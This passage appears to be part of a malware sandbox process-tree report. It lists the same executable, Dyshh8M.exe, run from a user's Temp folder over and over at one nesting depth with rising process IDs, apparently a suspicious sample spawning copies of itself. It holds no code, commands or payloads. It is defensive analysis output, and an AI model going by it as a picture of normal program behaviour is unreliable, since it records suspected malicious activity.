      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10844
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10852
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10876
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10896
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10904
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10984
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:10992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11008
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11016
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11024
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11056
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11072
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11080
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11088
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11096
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11276
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11288
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11304
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11312
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11320
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11336
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11364
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11392
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11400
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11408
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11416
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11424
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11464
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11472
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11480
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11616
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11624
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11648
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11656
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11664
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11672
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11716
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11752
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11760
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11768
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11776
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11784
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11792
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11816
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11824
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11832
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11844
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11852
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11860
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11868
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11876
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11884
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11896
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11904
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11988
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:11996
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12004
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12012
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12020
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12036
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12044
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12052
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12060
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12068
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12076
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12084
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12092
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12100
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:12156
